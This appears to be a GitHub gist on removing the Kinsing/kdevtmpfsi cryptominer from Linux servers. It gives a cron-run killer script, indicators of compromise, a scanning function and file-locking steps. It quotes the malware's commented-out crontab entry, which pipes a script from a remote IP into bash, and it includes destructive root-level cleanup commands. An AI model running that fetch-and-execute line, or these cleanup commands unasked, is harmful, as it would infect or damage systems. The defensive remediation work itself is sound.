@ArrayIterator
Last active October 18, 2023 19:29
Kill the kinsing & kdevtmpfsi malware

Kinsing files affected

Many of the "fixes" posted on the internet do not actually clean up a kinsing infection. Kinsing also talks to the network and listens on a network port, which is how the killer script below finds it.

Edit the crontab

Do not delete the wget or curl line that kinsing added to the crontab; comment it out instead, as shown below. Kinsing's scripts check the crontab for their URL and re-add the entry if it is missing, so leaving it in place as a comment keeps them quiet:

# your another crontab
# * * * * * curl http://185.122.204.197/cp.sh | bash > /dev/null 2>&1

You can additionally make root's crontab immutable so it cannot be rewritten. In our test this did not hold once kinsing was already running (it runs as root and can strip the attribute again), so treat it as a speed bump, not a fix. The spool path depends on the distribution:

chattr +i /var/spool/cron/crontabs/root    # Debian/Ubuntu
chattr +i /var/spool/cron/root             # RHEL/CentOS

Kill all processes

Create a bash script that kills kinsing and save it under root's home directory (any file name works, e.g. /root/killer-kin.sh).

Make sure net-tools (the package that provides netstat) is installed, then put the following cron entry in /etc/cron.d/killer-kin so the script runs every minute as root:

MAILTO=''
# KILLER
* * * * * root /bin/bash /root/killer-kin.sh

The /root/killer-kin.sh script (make it executable with chmod +x; the cron entry above invokes it through /bin/bash either way):

#!/bin/bash
# Runs every minute from /etc/cron.d/killer-kin; every step is safe to repeat.

# ALSO TEST THE SSH STATUS (exact process name, so a stray "ssh" client does not count)
if ! pgrep -x sshd >/dev/null; then
        echo "SSH STOPPED! STARTING"
        /usr/bin/systemctl start ssh      # the unit is called sshd on RHEL/CentOS
else
        echo "SSH RUNNING"
fi

# EMPTY THE PRELOAD LIST SO libsystem.so IS NO LONGER INJECTED INTO NEW PROCESSES
: > /etc/ld.so.preload

# bot.service IS THE KINSING SERVICE
/usr/bin/systemctl stop bot.service &>/dev/null
/usr/bin/systemctl disable bot.service &>/dev/null

# BLANK THE UNIT FILE AND MAKE systemd FORGET IT
: > /lib/systemd/system/bot.service
/usr/bin/systemctl daemon-reload

# KILL THE KINSING/KDEVTMPFSI PROCESSES THAT ARE LISTENING ON THE NETWORK
# (netstat comes from net-tools; -n avoids DNS lookups; the last column is PID/Program name)
for PID in $(netstat -tlnp 2>/dev/null | awk '/kinsing|kdevtmpfsi/ {split($NF,a,"/"); print a[1]}'); do
        if [[ $PID =~ ^[0-9]+$ ]]; then
                echo "MALWARE LISTENING ON NETWORK -> PID ${PID}"
                kill -9 "$PID"            # SIGKILL cannot be trapped or ignored
        fi
done

# KILL ANY REMAINING KINSING PROCESSES BY EXACT NAME
if pgrep -x kdevtmpfsi >/dev/null; then
        echo "MALWARE KDEV FOUND"
        pkill -9 -x kdevtmpfsi
fi
if pgrep -x kinsing >/dev/null; then
        echo "MALWARE KIN FOUND"
        pkill -9 -x kinsing
fi

# REMOVE KINSING FROM TMP, /dev/shm & /etc/data
# (immutable placeholder files created in the "Limit the files" step are left alone:
#  rm cannot touch them, and the error is hidden)
echo "DELETING KIN"
rm -f /tmp/kdevtmpfsi* /tmp/kinsing* /var/tmp/kinsing* /var/tmp/kdevtmpfsi* \
      /etc/data/kinsing /etc/data/libsystem.so /dev/shm/libsystem.so 2>/dev/null

# LAST ... FIND KINSING ANYWHERE ON THE FILESYSTEM
# TOO SLOW TO RUN EVERY MINUTE; RUN IT BY HAND ONCE (patterns quoted so the shell does not expand them)
#find / -iname 'kdevtmpfsi*' -exec rm -fv {} \;
#find / -iname 'kinsing*' -exec rm -fv {} \;

KINSING file definitions

Check whether /etc/ld.so.preload lists /etc/data/libsystem.so; the kinsing executable is commonly dropped at /etc/data/kinsing. The files kinsing leaves behind:

  1. Kinsing executable: /etc/data/kinsing
  2. Kinsing shared library, injected into every process through /etc/ld.so.preload: /etc/data/libsystem.so or /dev/shm/libsystem.so
  3. Kinsing disables the kernel's NMI watchdog by appending kernel.nmi_watchdog=0 to /etc/sysctl.conf
  4. Temporarily downloaded kinsing files matching the regex (/var)?/tmp/kinsing[0-9]* and (/var)?/tmp/kdevtmpfsi[0-9]*
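The four indicators above as a single check. This is an added example, not code from the original gist: scan_kinsing walks one filesystem tree and prints a FOUND line for every indicator, followed by the total. The tree root is a parameter so the same function can be exercised against a constructed directory; on a live host it is run as root against /.

```bash
#!/usr/bin/env bash
# Added example (not part of the original gist): check a filesystem tree for the
# kinsing indicators listed above. ROOT is normally "/", but is a parameter so
# the checks can be run against a constructed tree. Prints one "FOUND:" line per
# indicator and, as its last line, the number of findings.
scan_kinsing() {
    root="${1%/}"
    findings=0
    hit() { echo "FOUND: $1"; findings=$((findings + 1)); }

    # 1. ld.so.preload injecting libsystem.so into every new process
    if [ -f "$root/etc/ld.so.preload" ] && grep -q 'libsystem\.so' "$root/etc/ld.so.preload"; then
        hit "/etc/ld.so.preload loads libsystem.so"
    fi

    # 2. dropped executable and library
    for p in /etc/data/kinsing /etc/data/libsystem.so /dev/shm/libsystem.so; do
        if [ -e "$root$p" ]; then hit "$p exists"; fi
    done

    # 3. NMI watchdog disabled through sysctl.conf (with or without the kernel. prefix)
    if [ -f "$root/etc/sysctl.conf" ] && \
       grep -Eq '^[[:space:]]*(kernel\.)?nmi_watchdog[[:space:]]*=[[:space:]]*0' "$root/etc/sysctl.conf"; then
        hit "/etc/sysctl.conf sets nmi_watchdog=0"
    fi

    # 4. download staging files: (/var)?/tmp/kinsing[0-9]* and (/var)?/tmp/kdevtmpfsi[0-9]*
    for d in /tmp /var/tmp; do
        for f in "$root$d"/kinsing* "$root$d"/kdevtmpfsi*; do
            if [ -e "$f" ]; then hit "${f#"$root"} is a kinsing drop file"; fi
        done
    done

    echo "$findings"
}

# Usage on a live host (as root): bash scan-kinsing.sh /
if [ -n "${1:-}" ]; then
    scan_kinsing "$1"
fi
```

A non-zero total means the host is still dirty even if no kinsing process is running; a clean tree prints only 0.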

Limit the files

  1. Edit /etc/sysctl.conf, remove the nmi_watchdog line kinsing appended and add the settings you need, then run: chattr +i /etc/sysctl.conf
  2. Create empty placeholder files where the droppers land: echo '' > /tmp/kinsing; echo '' > /tmp/kdevtmpfsi, then run chattr +i /tmp/kinsing /tmp/kdevtmpfsi
  3. Overwrite the kinsing binary and libsystem.so with empty files: echo '' > /etc/data/kinsing; echo '' > /etc/data/libsystem.so, then run chattr +i /etc/data/kinsing /etc/data/libsystem.so

NOTE

A clean install (or reinstall) of the server is the recommended fix. The steps above only contain the infection on a machine you cannot rebuild right away.
